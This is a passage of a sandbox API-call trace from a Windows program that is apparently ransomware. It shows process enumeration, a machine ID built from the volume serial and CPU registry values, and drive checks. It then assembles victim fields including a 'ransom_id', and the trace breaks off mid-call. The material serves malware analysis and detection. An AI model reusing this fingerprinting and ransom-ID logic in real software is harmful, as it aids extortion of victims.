[0036.163] GetLastError () returned 0xcb [0036.163] Process32NextW (in: hSnapshot=0x1ac, lppe=0x2d30000 | out: lppe=0x2d30000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="closer_ban.exe")) returned 1 [0036.163] GetLastError () returned 0xcb [0036.163] Process32NextW (in: hSnapshot=0x1ac, lppe=0x2d30000 | out: lppe=0x2d30000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="figured.exe")) returned 1 [0036.164] GetLastError () returned 0xcb [0036.164] Process32NextW (in: hSnapshot=0x1ac, lppe=0x2d30000 | out: lppe=0x2d30000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x544, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="extraordinarynasdaq.exe")) returned 1 [0036.164] GetLastError () returned 0xcb [0036.164] Process32NextW (in: hSnapshot=0x1ac, lppe=0x2d30000 | out: lppe=0x2d30000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x82c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="gossip_vocal_outlet_publication.exe")) returned 1 [0036.165] GetLastError () returned 0xcb [0036.165] Process32NextW (in: hSnapshot=0x1ac, lppe=0x2d30000 | out: lppe=0x2d30000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="advantages_muscle.exe")) returned 1 [0036.166] GetLastError () returned 0xcb [0036.166] Process32NextW (in: hSnapshot=0x1ac, lppe=0x2d30000 | out: lppe=0x2d30000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="reserve-springfield.exe")) returned 1 [0036.166] GetLastError () returned 0xcb [0036.166] Process32NextW (in: hSnapshot=0x1ac, lppe=0x2d30000 | out: lppe=0x2d30000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="regardless dk chester theft.exe")) returned 1 [0036.167] GetLastError () returned 0xcb [0036.167] Process32NextW (in: hSnapshot=0x1ac, lppe=0x2d30000 | out: lppe=0x2d30000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="havebuyers.exe")) returned 1 [0036.168] GetLastError () returned 0xcb [0036.168] Process32NextW (in: hSnapshot=0x1ac, lppe=0x2d30000 | out: lppe=0x2d30000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="discuss band trucks.exe")) returned 1 [0036.168] GetLastError () returned 0xcb [0036.168] Process32NextW (in: hSnapshot=0x1ac, lppe=0x2d30000 | out: lppe=0x2d30000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x93c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="honey.exe")) returned 1 [0036.169] GetLastError () returned 0xcb [0036.169] Process32NextW (in: hSnapshot=0x1ac, lppe=0x2d30000 | out: lppe=0x2d30000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x488, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="minimal.exe")) returned 1 [0036.170] GetLastError () returned 0xcb [0036.170] Process32NextW (in: hSnapshot=0x1ac, lppe=0x2d30000 | out: lppe=0x2d30000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="declarationrj.exe")) returned 1 [0036.170] GetLastError () returned 0xcb [0036.170] Process32NextW (in: hSnapshot=0x1ac, lppe=0x2d30000 | out: lppe=0x2d30000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x634, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="prison_mountains_vienna.exe")) returned 1 [0036.172] GetLastError () returned 0xcb [0036.172] Process32NextW (in: hSnapshot=0x1ac, lppe=0x2d30000 | out: lppe=0x2d30000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="turtle.exe")) returned 1 [0036.173] GetLastError () returned 0xcb [0036.173] Process32NextW (in: hSnapshot=0x1ac, lppe=0x2d30000 | out: lppe=0x2d30000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="politicalinterestboom.exe")) returned 1 [0036.173] GetLastError () returned 0xcb [0036.173] Process32NextW (in: hSnapshot=0x1ac, lppe=0x2d30000 | out: lppe=0x2d30000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0036.174] GetLastError () returned 0xcb [0036.174] Process32NextW (in: hSnapshot=0x1ac, lppe=0x2d30000 | out: lppe=0x2d30000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0036.174] GetLastError () returned 0xcb [0036.174] Process32NextW (in: hSnapshot=0x1ac, lppe=0x2d30000 | out: lppe=0x2d30000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0036.175] GetLastError () returned 0xcb [0036.175] Process32NextW (in: hSnapshot=0x1ac, lppe=0x2d30000 | out: lppe=0x2d30000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0036.176] GetLastError () returned 0xcb [0036.176] Process32NextW (in: hSnapshot=0x1ac, lppe=0x2d30000 | out: lppe=0x2d30000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0036.177] GetLastError () returned 0xcb [0036.177] Process32NextW (in: hSnapshot=0x1ac, lppe=0x2d30000 | out: lppe=0x2d30000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0036.177] GetLastError () returned 0xcb [0036.178] Process32NextW (in: hSnapshot=0x1ac, lppe=0x2d30000 | out: lppe=0x2d30000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="Jeremy Witt's Dental Records.exe")) returned 1 [0036.178] GetLastError () returned 0xcb [0036.178] Process32NextW (in: hSnapshot=0x1ac, lppe=0x2d30000 | out: lppe=0x2d30000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="Jeremy Witt's Dental Records.exe")) returned 0 [0036.179] VirtualFree (lpAddress=0x2d30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0036.179] CloseHandle (hObject=0x1ac) returned 1 [0036.179] VirtualFree (lpAddress=0x2d20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0036.179] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2d20000 [0036.179] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2d30000 [0036.179] GetWindowsDirectoryW (in: lpBuffer=0x2d30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0036.179] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2d30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2d30600, lpMaximumComponentLength=0x2d30608, lpFileSystemFlags=0x2d30604, lpFileSystemNameBuffer=0x2d30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2d30600*=0xd2ca4def, lpMaximumComponentLength=0x2d30608*=0xff, lpFileSystemFlags=0x2d30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0036.179] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", ulOptions=0x0, samDesired=0x20019, phkResult=0xdcf688 | out: phkResult=0xdcf688*=0x1ac) returned 0x0 [0036.179] RegQueryValueExW (in: hKey=0x1ac, lpValueName="ProcessorNameString", lpReserved=0x0, lpType=0x0, lpData=0x2d3060c, lpcbData=0xdcf698*=0x80 | out: lpType=0x0, lpData=0x2d3060c*=0x49, lpcbData=0xdcf698*=0x54) returned 0x0 [0036.180] RegCloseKey (hKey=0x1ac) returned 0x0 [0036.180] lstrlenW (lpString="Intel(R) Xeon(R) CPU E3-1270 v5 @ 3.60GHz") returned 41 [0036.180] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", ulOptions=0x0, samDesired=0x20019, phkResult=0xdcf688 | out: phkResult=0xdcf688*=0x1ac) returned 0x0 [0036.180] RegQueryValueExW (in: hKey=0x1ac, lpValueName="Identifier", lpReserved=0x0, lpType=0x0, lpData=0x2d3065e, lpcbData=0xdcf698*=0x80 | out: lpType=0x0, lpData=0x2d3065e*=0x49, lpcbData=0xdcf698*=0x4a) returned 0x0 [0036.180] RegCloseKey (hKey=0x1ac) returned 0x0 [0036.180] wsprintfW (in: param_1=0x2d20000, param_2="%d" | out: param_1="-758493713") returned 10 [0036.180] lstrcatW (in: lpString1="-758493713", lpString2="Intel(R) Xeon(R) CPU E3-1270 v5 @ 3.60GHzIntel64 Family 6 Model 94 Stepping 3" | out: lpString1="-758493713Intel(R) Xeon(R) CPU E3-1270 v5 @ 3.60GHzIntel64 Family 6 Model 94 Stepping 3") returned="-758493713Intel(R) Xeon(R) CPU E3-1270 v5 @ 3.60GHzIntel64 Family 6 Model 94 Stepping 3" [0036.180] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77c40000 [0036.180] GetProcAddress (hModule=0x77c40000, lpProcName="RtlComputeCrc32") returned 0x77c66b10 [0036.180] lstrlenW (lpString="-758493713Intel(R) Xeon(R) CPU E3-1270 v5 @ 3.60GHzIntel64 Family 6 Model 94 Stepping 3") returned 87 [0036.180] RtlComputeCrc32 (PartialCrc=0x29a, Buffer=0x2d20000, Length=0xae) returned 0xdce1bb8b [0036.180] VirtualFree (lpAddress=0x2d30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0036.180] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2d30000 [0036.180] GetDriveTypeW (lpRootPathName="A:\\") returned 0x1 [0036.180] GetDriveTypeW (lpRootPathName="B:\\") returned 0x1 [0036.181] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.181] lstrcatW (in: lpString1="", lpString2="C:" | out: lpString1="C:") returned="C:" [0036.181] lstrcatW (in: lpString1="C:", lpString2="FIXED" | out: lpString1="C:FIXED") returned="C:FIXED" [0036.181] lstrcatW (in: lpString1="C:FIXED", lpString2="_" | out: lpString1="C:FIXED_") returned="C:FIXED_" [0036.181] GetDiskFreeSpaceW (in: lpRootPathName="C:\\", lpSectorsPerCluster=0xdcf724, lpBytesPerSector=0xdcf730, lpNumberOfFreeClusters=0xdcf738, lpTotalNumberOfClusters=0xdcf734 | out: lpSectorsPerCluster=0xdcf724, lpBytesPerSector=0xdcf730, lpNumberOfFreeClusters=0xdcf738, lpTotalNumberOfClusters=0xdcf734) returned 1 [0036.181] lstrlenW (lpString="C:FIXED_") returned 8 [0036.181] wsprintfW (in: param_1=0x2d30010, param_2="%I64u/" | out: param_1="549227327488/") returned 13 [0036.181] lstrlenW (lpString="C:FIXED_549227327488/") returned 21 [0036.181] wsprintfW (in: param_1=0x2d3002a, param_2="%I64u" | out: param_1="17491410944") returned 11 [0036.181] lstrcatW (in: lpString1="C:FIXED_549227327488/17491410944", lpString2="," | out: lpString1="C:FIXED_549227327488/17491410944,") returned="C:FIXED_549227327488/17491410944," [0036.181] GetDriveTypeW (lpRootPathName="D:\\") returned 0x1 [0036.181] GetDriveTypeW (lpRootPathName="E:\\") returned 0x1 [0036.181] GetDriveTypeW (lpRootPathName="F:\\") returned 0x1 [0036.181] GetDriveTypeW (lpRootPathName="G:\\") returned 0x1 [0036.182] GetDriveTypeW (lpRootPathName="H:\\") returned 0x1 [0036.182] GetDriveTypeW (lpRootPathName="I:\\") returned 0x1 [0036.182] GetDriveTypeW (lpRootPathName="J:\\") returned 0x1 [0036.182] GetDriveTypeW (lpRootPathName="K:\\") returned 0x1 [0036.182] GetDriveTypeW (lpRootPathName="L:\\") returned 0x1 [0036.182] GetDriveTypeW (lpRootPathName="M:\\") returned 0x1 [0036.182] GetDriveTypeW (lpRootPathName="N:\\") returned 0x1 [0036.182] GetDriveTypeW (lpRootPathName="O:\\") returned 0x1 [0036.182] GetDriveTypeW (lpRootPathName="P:\\") returned 0x1 [0036.183] GetDriveTypeW (lpRootPathName="Q:\\") returned 0x1 [0036.183] GetDriveTypeW (lpRootPathName="R:\\") returned 0x1 [0036.183] GetDriveTypeW (lpRootPathName="S:\\") returned 0x1 [0036.183] GetDriveTypeW (lpRootPathName="T:\\") returned 0x1 [0036.183] GetDriveTypeW (lpRootPathName="U:\\") returned 0x1 [0036.183] GetDriveTypeW (lpRootPathName="V:\\") returned 0x1 [0036.183] GetDriveTypeW (lpRootPathName="W:\\") returned 0x1 [0036.183] GetDriveTypeW (lpRootPathName="X:\\") returned 0x1 [0036.183] GetDriveTypeW (lpRootPathName="Y:\\") returned 0x1 [0036.183] GetDriveTypeW (lpRootPathName="Z:\\") returned 0x1 [0036.184] GetDriveTypeW (lpRootPathName="\x14:\\") returned 0x1 [0036.184] lstrlenW (lpString="C:FIXED_549227327488/17491410944,") returned 33 [0036.184] lstrlenW (lpString="CIiHmnxMn6Ps") returned 12 [0036.184] lstrlenW (lpString="pc_user") returned 7 [0036.184] lstrlenW (lpString="LHNIWSJ") returned 7 [0036.184] lstrlenW (lpString="pc_name") returned 7 [0036.184] lstrlenW (lpString="WORKGROUP") returned 9 [0036.184] lstrlenW (lpString="pc_group") returned 8 [0036.184] lstrlenW (lpString="en-US") returned 5 [0036.184] lstrlenW (lpString="pc_lang") returned 7 [0036.184] lstrlenW (lpString="0") returned 1 [0036.184] lstrlenW (lpString="pc_keyb") returned 7 [0036.184] lstrlenW (lpString="Windows 10 Pro") returned 14 [0036.184] lstrlenW (lpString="os_major") returned 8 [0036.184] lstrlenW (lpString="x64") returned 3 [0036.184] lstrlenW (lpString="os_bit") returned 6 [0036.184] lstrlenW (lpString="C:FIXED_549227327488/17491410944") returned 32 [0036.184] lstrlenW (lpString="hdd") returned 3 [0036.184] VirtualAlloc (lpAddress=0x0, dwSize=0x57a, flAllocationType=0x3000, flProtect=0x4) returned 0x2d40000 [0036.184] lstrcatW (in: lpString1="", lpString2="pc_user" | out: lpString1="pc_user") returned="pc_user" [0036.184] lstrcatW (in: lpString1="pc_user", lpString2="=" | out: lpString1="pc_user=") returned="pc_user=" [0036.184] lstrcatW (in: lpString1="pc_user=", lpString2="CIiHmnxMn6Ps" | out: lpString1="pc_user=CIiHmnxMn6Ps") returned="pc_user=CIiHmnxMn6Ps" [0036.184] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps", lpString2="&" | out: lpString1="pc_user=CIiHmnxMn6Ps&") returned="pc_user=CIiHmnxMn6Ps&" [0036.184] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&", lpString2="pc_name" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name") returned="pc_user=CIiHmnxMn6Ps&pc_name" [0036.184] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&pc_name", lpString2="=" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=") returned="pc_user=CIiHmnxMn6Ps&pc_name=" [0036.184] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=", lpString2="LHNIWSJ" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ") returned="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ" [0036.184] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ", lpString2="&" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&") returned="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&" [0036.184] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&", lpString2="pc_group" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group") returned="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group" [0036.184] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group", lpString2="=" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=") returned="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=" [0036.184] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=", lpString2="WORKGROUP" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP") returned="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP" [0036.185] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP", lpString2="&" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&") returned="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&" [0036.185] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&", lpString2="pc_lang" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang") returned="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang" [0036.185] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang", lpString2="=" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=") returned="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=" [0036.185] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=", lpString2="en-US" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US") returned="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US" [0036.185] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US", lpString2="&" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&") returned="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&" [0036.185] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&", lpString2="pc_keyb" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb") returned="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb" [0036.185] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb", lpString2="=" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=") returned="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=" [0036.185] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=", lpString2="0" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0") returned="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0" [0036.185] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0", lpString2="&" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&") returned="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&" [0036.185] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&", lpString2="os_major" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major") returned="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major" [0036.185] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major", lpString2="=" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=") returned="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=" [0036.185] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=", lpString2="Windows 10 Pro" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro") returned="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro" [0036.185] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro", lpString2="&" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&") returned="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&" [0036.185] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&", lpString2="os_bit" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit") returned="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit" [0036.185] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit", lpString2="=" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=") returned="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=" [0036.185] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=", lpString2="x64" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64") returned="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64" [0036.185] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64", lpString2="&" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&") returned="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&" [0036.185] VirtualAlloc (lpAddress=0x0, dwSize=0x42, flAllocationType=0x3000, flProtect=0x40) returned 0x2d50000 [0036.185] wsprintfW (in: param_1=0x2d50000, param_2="%x%x" | out: param_1="dce1bb8bd2ca4def") returned 16 [0036.185] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&", lpString2="ransom_id" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id") returned="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id" [0036.186] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id", lpString2="=" | out: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=") returned="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=" [0036.186] lstrcatW (in: lpString1="pc_user=CIiHmnxMn6Ps&pc_name=LHNIWSJ&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 10 Pro&os_bit=x64&ransom_id=", 